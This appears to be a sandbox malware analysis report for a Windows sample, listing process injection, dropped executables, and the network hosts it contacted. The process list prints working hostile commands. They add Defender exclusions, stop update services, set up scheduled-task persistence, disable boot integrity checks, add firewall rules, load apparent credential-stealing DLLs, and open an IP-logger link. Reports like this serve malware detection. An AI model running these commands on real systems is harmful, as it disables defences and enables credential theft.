Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\file.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2408 wrote to memory of 2544 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\WsatConfig.exe
PID 2408 wrote to memory of 2544 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\WsatConfig.exe
PID 2408 wrote to memory of 2544 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\WsatConfig.exe
PID 2408 wrote to memory of 2544 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\WsatConfig.exe
PID 2408 wrote to memory of 2264 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2408 wrote to memory of 2264 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2408 wrote to memory of 2264 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2408 wrote to memory of 2264 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2408 wrote to memory of 2264 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2408 wrote to memory of 2264 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2408 wrote to memory of 2264 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2408 wrote to memory of 2264 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2408 wrote to memory of 2264 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2408 wrote to memory of 2264 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2408 wrote to memory of 2264 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2408 wrote to memory of 2264 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2264 wrote to memory of 564 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Users\Admin\Pictures\iI4FE5DOdYGnsqgfJvFzKbNA.exe
PID 2264 wrote to memory of 564 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Users\Admin\Pictures\iI4FE5DOdYGnsqgfJvFzKbNA.exe
PID 2264 wrote to memory of 564 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Users\Admin\Pictures\iI4FE5DOdYGnsqgfJvFzKbNA.exe
PID 2264 wrote to memory of 564 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Users\Admin\Pictures\iI4FE5DOdYGnsqgfJvFzKbNA.exe
PID 2264 wrote to memory of 1468 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Users\Admin\Pictures\FykH2HsVfDnnj7oZVpqHE25N.exe
PID 2264 wrote to memory of 1468 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Users\Admin\Pictures\FykH2HsVfDnnj7oZVpqHE25N.exe
PID 2264 wrote to memory of 1468 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Users\Admin\Pictures\FykH2HsVfDnnj7oZVpqHE25N.exe
PID 2264 wrote to memory of 1468 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Users\Admin\Pictures\FykH2HsVfDnnj7oZVpqHE25N.exe
PID 2264 wrote to memory of 1664 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Users\Admin\Pictures\walat23dy3PjMc1F7wbJfEd7.exe
PID 2264 wrote to memory of 1664 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Users\Admin\Pictures\walat23dy3PjMc1F7wbJfEd7.exe
PID 2264 wrote to memory of 1664 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Users\Admin\Pictures\walat23dy3PjMc1F7wbJfEd7.exe
PID 2264 wrote to memory of 1664 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Users\Admin\Pictures\walat23dy3PjMc1F7wbJfEd7.exe
PID 2264 wrote to memory of 1224 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Users\Admin\Pictures\a46CknyPHlvkEaN9CZpK7aBo.exe
PID 2264 wrote to memory of 1224 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Users\Admin\Pictures\a46CknyPHlvkEaN9CZpK7aBo.exe
PID 2264 wrote to memory of 1224 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Users\Admin\Pictures\a46CknyPHlvkEaN9CZpK7aBo.exe
PID 2264 wrote to memory of 1224 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Users\Admin\Pictures\a46CknyPHlvkEaN9CZpK7aBo.exe
PID 2264 wrote to memory of 1224 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Users\Admin\Pictures\a46CknyPHlvkEaN9CZpK7aBo.exe
PID 2264 wrote to memory of 1224 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Users\Admin\Pictures\a46CknyPHlvkEaN9CZpK7aBo.exe
PID 2264 wrote to memory of 1224 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Users\Admin\Pictures\a46CknyPHlvkEaN9CZpK7aBo.exe
PID 2264 wrote to memory of 2196 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Users\Admin\Pictures\EqY1yU2BuPoern4L1Clp7qEo.exe
PID 2264 wrote to memory of 2196 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Users\Admin\Pictures\EqY1yU2BuPoern4L1Clp7qEo.exe
PID 2264 wrote to memory of 2196 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Users\Admin\Pictures\EqY1yU2BuPoern4L1Clp7qEo.exe
PID 2264 wrote to memory of 2196 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Users\Admin\Pictures\EqY1yU2BuPoern4L1Clp7qEo.exe
PID 2264 wrote to memory of 1124 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Users\Admin\Pictures\ghj5tC29p41ay41weXgZ4WtI.exe
PID 2264 wrote to memory of 1124 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Users\Admin\Pictures\ghj5tC29p41ay41weXgZ4WtI.exe
PID 2264 wrote to memory of 1124 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Users\Admin\Pictures\ghj5tC29p41ay41weXgZ4WtI.exe
PID 2264 wrote to memory of 1124 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Users\Admin\Pictures\ghj5tC29p41ay41weXgZ4WtI.exe
PID 564 wrote to memory of 1504 N/A C:\Users\Admin\Pictures\iI4FE5DOdYGnsqgfJvFzKbNA.exe C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe
PID 564 wrote to memory of 1504 N/A C:\Users\Admin\Pictures\iI4FE5DOdYGnsqgfJvFzKbNA.exe C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe
PID 564 wrote to memory of 1504 N/A C:\Users\Admin\Pictures\iI4FE5DOdYGnsqgfJvFzKbNA.exe C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe
PID 564 wrote to memory of 1504 N/A C:\Users\Admin\Pictures\iI4FE5DOdYGnsqgfJvFzKbNA.exe C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe
PID 2264 wrote to memory of 1312 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Users\Admin\Pictures\ebu3UllRuMr9MdnUccCb3KDw.exe
PID 2264 wrote to memory of 1312 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Users\Admin\Pictures\ebu3UllRuMr9MdnUccCb3KDw.exe
PID 2264 wrote to memory of 1312 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Users\Admin\Pictures\ebu3UllRuMr9MdnUccCb3KDw.exe
PID 2264 wrote to memory of 1312 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Users\Admin\Pictures\ebu3UllRuMr9MdnUccCb3KDw.exe
PID 2264 wrote to memory of 1312 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Users\Admin\Pictures\ebu3UllRuMr9MdnUccCb3KDw.exe
PID 2264 wrote to memory of 1312 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Users\Admin\Pictures\ebu3UllRuMr9MdnUccCb3KDw.exe
PID 2264 wrote to memory of 1312 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Users\Admin\Pictures\ebu3UllRuMr9MdnUccCb3KDw.exe
PID 2264 wrote to memory of 2148 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Users\Admin\Pictures\u8iy3TCdGZHM8tCb1WqBJgR8.exe
PID 2264 wrote to memory of 2148 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Users\Admin\Pictures\u8iy3TCdGZHM8tCb1WqBJgR8.exe
PID 2264 wrote to memory of 2148 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Users\Admin\Pictures\u8iy3TCdGZHM8tCb1WqBJgR8.exe
PID 2264 wrote to memory of 2148 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Users\Admin\Pictures\u8iy3TCdGZHM8tCb1WqBJgR8.exe
PID 1504 wrote to memory of 2012 N/A C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe C:\Windows\system32\conhost.exe
PID 1504 wrote to memory of 2012 N/A C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe C:\Windows\system32\conhost.exe
PID 1504 wrote to memory of 2012 N/A C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe C:\Windows\system32\conhost.exe
PID 1504 wrote to memory of 2012 N/A C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe C:\Windows\system32\conhost.exe
PID 1224 wrote to memory of 1656 N/A C:\Users\Admin\Pictures\a46CknyPHlvkEaN9CZpK7aBo.exe C:\Users\Admin\AppData\Local\Temp\is-AEPFU.tmp\a46CknyPHlvkEaN9CZpK7aBo.tmp
PID 1224 wrote to memory of 1656 N/A C:\Users\Admin\Pictures\a46CknyPHlvkEaN9CZpK7aBo.exe C:\Users\Admin\AppData\Local\Temp\is-AEPFU.tmp\a46CknyPHlvkEaN9CZpK7aBo.tmp

Processes

C:\Users\Admin\AppData\Local\Temp\file.exe

"C:\Users\Admin\AppData\Local\Temp\file.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\WsatConfig.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\WsatConfig.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Users\Admin\Pictures\iI4FE5DOdYGnsqgfJvFzKbNA.exe

"C:\Users\Admin\Pictures\iI4FE5DOdYGnsqgfJvFzKbNA.exe"

C:\Users\Admin\Pictures\FykH2HsVfDnnj7oZVpqHE25N.exe

"C:\Users\Admin\Pictures\FykH2HsVfDnnj7oZVpqHE25N.exe"

C:\Users\Admin\Pictures\a46CknyPHlvkEaN9CZpK7aBo.exe

"C:\Users\Admin\Pictures\a46CknyPHlvkEaN9CZpK7aBo.exe"

C:\Users\Admin\Pictures\walat23dy3PjMc1F7wbJfEd7.exe

"C:\Users\Admin\Pictures\walat23dy3PjMc1F7wbJfEd7.exe"

C:\Users\Admin\Pictures\ghj5tC29p41ay41weXgZ4WtI.exe

"C:\Users\Admin\Pictures\ghj5tC29p41ay41weXgZ4WtI.exe"

C:\Users\Admin\Pictures\EqY1yU2BuPoern4L1Clp7qEo.exe

"C:\Users\Admin\Pictures\EqY1yU2BuPoern4L1Clp7qEo.exe"

C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe

"C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe"

C:\Users\Admin\Pictures\ebu3UllRuMr9MdnUccCb3KDw.exe

"C:\Users\Admin\Pictures\ebu3UllRuMr9MdnUccCb3KDw.exe" --silent --allusers=0

C:\Users\Admin\Pictures\u8iy3TCdGZHM8tCb1WqBJgR8.exe

"C:\Users\Admin\Pictures\u8iy3TCdGZHM8tCb1WqBJgR8.exe"

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN nhdues.exe /TR "C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe" /F

C:\Users\Admin\AppData\Local\Temp\is-AEPFU.tmp\a46CknyPHlvkEaN9CZpK7aBo.tmp

"C:\Users\Admin\AppData\Local\Temp\is-AEPFU.tmp\a46CknyPHlvkEaN9CZpK7aBo.tmp" /SL5="$8001A,491750,408064,C:\Users\Admin\Pictures\a46CknyPHlvkEaN9CZpK7aBo.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "nhdues.exe" /P "Admin:N"&&CACLS "nhdues.exe" /P "Admin:R" /E&&echo Y|CACLS "..\1ff8bec27e" /P "Admin:N"&&CACLS "..\1ff8bec27e" /P "Admin:R" /E&&Exit

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "nhdues.exe" /P "Admin:N"

C:\Users\Admin\Pictures\FLnOhZMhkxBwS6yPdhkegb32.exe

"C:\Users\Admin\Pictures\FLnOhZMhkxBwS6yPdhkegb32.exe"

C:\Windows\SysWOW64\cacls.exe

CACLS "nhdues.exe" /P "Admin:R" /E

C:\Windows\SysWOW64\cacls.exe

CACLS "..\1ff8bec27e" /P "Admin:N"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "..\1ff8bec27e" /P "Admin:R" /E

C:\Users\Admin\Pictures\1UHcLGYJC6WmkejoMRN5dfRU.exe

"C:\Users\Admin\Pictures\1UHcLGYJC6WmkejoMRN5dfRU.exe"

C:\Users\Admin\AppData\Local\Temp\is-04DMD.tmp\8758677____.exe

"C:\Users\Admin\AppData\Local\Temp\is-04DMD.tmp\8758677____.exe" /S /UID=lylal220

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\1130335503.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Users\Admin\AppData\Local\Temp\1130335503.exe

"C:\Users\Admin\AppData\Local\Temp\1130335503.exe"

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "204195515407223645-332532506182008150120580824635124315601540113345344060515"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c taskkill /im "FykH2HsVfDnnj7oZVpqHE25N.exe" /f & erase "C:\Users\Admin\Pictures\FykH2HsVfDnnj7oZVpqHE25N.exe" & exit

C:\Windows\SysWOW64\taskkill.exe

taskkill /im "FykH2HsVfDnnj7oZVpqHE25N.exe" /f

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\system32\taskeng.exe

taskeng.exe {8AA18C1B-A578-48E8-AAED-20993D8C9F84} S-1-5-21-607259312-1573743425-2763420908-1000:NGTQGRML\Admin:Interactive:[1]

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe

C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /delete /f /tn "GoogleUpdateTaskMachineQC"

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Program Files\Common Files\LVNLYGGZHA\lightcleaner.exe

"C:\Program Files\Common Files\LVNLYGGZHA\lightcleaner.exe" /VERYSILENT

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Users\Admin\AppData\Local\Temp\24-5c628-abd-15e86-1fb13046e514e\Selotemate.exe

"C:\Users\Admin\AppData\Local\Temp\24-5c628-abd-15e86-1fb13046e514e\Selotemate.exe"

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /create /f /ru "System" /tn "GoogleUpdateTaskMachineQC" /xml "C:\Users\Admin\AppData\Local\Temp\xyvvnnvseiqa.xml"

C:\Users\Admin\AppData\Local\Temp\is-59MQS.tmp\lightcleaner.tmp

"C:\Users\Admin\AppData\Local\Temp\is-59MQS.tmp\lightcleaner.tmp" /SL5="$201D4,833775,56832,C:\Program Files\Common Files\LVNLYGGZHA\lightcleaner.exe" /VERYSILENT

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c start https://iplogger.com/1ciGA4

C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe

dw20.exe -x -s 396

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"

C:\Program Files\Internet Explorer\iexplore.exe

"C:\Program Files\Internet Explorer\iexplore.exe" https://iplogger.com/1ciGA4

C:\Program Files\Google\Chrome\updater.exe

"C:\Program Files\Google\Chrome\updater.exe"

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2112 CREDAT:275457 /prefetch:2

C:\Windows\system32\wbem\WMIADAP.EXE

wmiadap.exe /F /T /R

C:\Windows\syswow64\rundll32.exe

"C:\Windows\syswow64\rundll32.exe" "C:\Windows\syswow64\shell32.dll",#61 C:\Users\Admin\AppData\Local\Temp\1130335503.exe

C:\Windows\system32\makecab.exe

"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20231004220120.log C:\Windows\Logs\CBS\CbsPersist_20231004220120.cab

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Users\Admin\Pictures\u8iy3TCdGZHM8tCb1WqBJgR8.exe

"C:\Users\Admin\Pictures\u8iy3TCdGZHM8tCb1WqBJgR8.exe"

C:\Users\Admin\Pictures\walat23dy3PjMc1F7wbJfEd7.exe

"C:\Users\Admin\Pictures\walat23dy3PjMc1F7wbJfEd7.exe"

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /create /f /ru "System" /tn "GoogleUpdateTaskMachineQC" /xml "C:\Windows\TEMP\xyvvnnvseiqa.xml"

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\system32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\explorer.exe

C:\Windows\explorer.exe

C:\Windows\system32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\rss\csrss.exe

C:\Windows\rss\csrss.exe

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a967e0f403b652\cred64.dll, Main

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a967e0f403b652\clip64.dll, Main

C:\Windows\system32\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a967e0f403b652\cred64.dll, Main

C:\Windows\system32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\system32\schtasks.exe

schtasks /delete /tn ScheduledUpdate /f

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll

C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe

"C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"

C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe

C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -create {71A3C7FC-F751-4982-AEC1-E958357E6813} -d "Windows Fast Mode" -application OSLOADER

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} device partition=C:

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} osdevice partition=C:

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} systemroot \Windows

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} path \Windows\system32\osloader.exe

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} kernel ntkrnlmp.exe

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} recoveryenabled 0

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nx OptIn

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nointegritychecks 1

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} inherit {bootloadersettings}

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -displayorder {71A3C7FC-F751-4982-AEC1-E958357E6813} -addlast

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -timeout 0

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -default {71A3C7FC-F751-4982-AEC1-E958357E6813}

C:\Windows\system32\bcdedit.exe

C:\Windows\Sysnative\bcdedit.exe /v

C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe

C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe

C:\Windows\system32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\windefender.exe

"C:\Windows\windefender.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 yip.su udp
DE 148.251.234.93:443 yip.su tcp
US 104.20.67.143:443 pastebin.com tcp
US 8.8.8.8:53 downloads.digitalpulsedata.com udp
RU 5.42.64.10:80 5.42.64.10 tcp
US 8.8.8.8:53 ji.fhauiehgha.com udp
US 85.217.144.143:80 85.217.144.143 tcp
US 8.8.8.8:53 flyawayaero.net udp
US 8.8.8.8:53 jetpackdelivery.net udp
US 8.8.8.8:53 bolidare.beget.tech udp
US 8.8.8.8:53 lycheepanel.info udp
US 8.8.8.8:53 net.geo.opera.com udp
US 85.217.144.143:80 85.217.144.143 tcp
US 8.8.8.8:53 goboh2b.top udp
US 8.8.8.8:53 link.storjshare.io udp
US 104.21.32.208:443 lycheepanel.info tcp
US 188.114.97.1:443 jetpackdelivery.net tcp
US 172.67.216.81:443 flyawayaero.net tcp
RU 45.8.228.16:80 goboh2b.top tcp
NL 13.227.219.122:443 downloads.digitalpulsedata.com tcp
US 136.0.77.2:443 link.storjshare.io tcp
NL 185.26.182.111:80 net.geo.opera.com tcp
NL 185.26.182.111:443 net.geo.opera.com tcp
RU 91.106.207.50:80 bolidare.beget.tech tcp
US 8.8.8.8:53 potatogoose.com udp
US 8.8.8.8:53 apps.identrust.com udp
US 8.8.8.8:53 apps.identrust.com udp
US 172.67.180.173:443 potatogoose.com tcp
NL 88.221.25.169:80 apps.identrust.com tcp
NL 88.221.25.153:80 apps.identrust.com tcp
HK 103.100.211.218:80 ji.fhauiehgha.com tcp
US 8.8.8.8:53 justsafepay.com udp
US 188.114.96.0:443 justsafepay.com tcp
US 8.8.8.8:53 z.nnnaajjjgc.com udp
US 8.8.8.8:53 link.storjshare.io udp
US 136.0.77.2:80 link.storjshare.io tcp
MU 156.236.72.121:443 z.nnnaajjjgc.com tcp
US 8.8.8.8:53 demo.seafile.com udp
DE 168.119.152.22:80 demo.seafile.com tcp
BG 193.42.32.29:80 193.42.32.29 tcp
DE 168.119.152.22:443 demo.seafile.com tcp
RU 5.42.64.10:80 5.42.64.10 tcp
RU 5.42.64.10:80 5.42.64.10 tcp
US 8.8.8.8:53 m7val1dat0r.info udp
US 188.114.97.0:443 m7val1dat0r.info tcp
US 8.8.8.8:53 app.nnnaajjjgc.com udp
HK 154.221.26.108:80 app.nnnaajjjgc.com tcp
US 8.8.8.8:53 script.google.com udp
DE 172.217.23.206:80 script.google.com tcp
DE 172.217.23.206:443 script.google.com tcp
US 8.8.8.8:53 t.me udp
US 8.8.8.8:53 connectini.net udp
NL 149.154.167.99:443 t.me tcp
GB 91.109.116.11:443 connectini.net tcp
NL 149.154.167.99:443 t.me tcp
NL 149.154.167.99:443 t.me tcp
NL 149.154.167.99:443 t.me tcp
US 8.8.8.8:53 steamcommunity.com udp
JP 23.207.106.113:443 steamcommunity.com tcp
US 8.8.8.8:53 script.googleusercontent.com udp
NL 142.251.36.1:443 script.googleusercontent.com tcp
DE 116.203.7.13:80 116.203.7.13 tcp
US 8.8.8.8:53 wewewe.s3.eu-central-1.amazonaws.com udp
US 8.8.8.8:53 link.storjshare.io udp
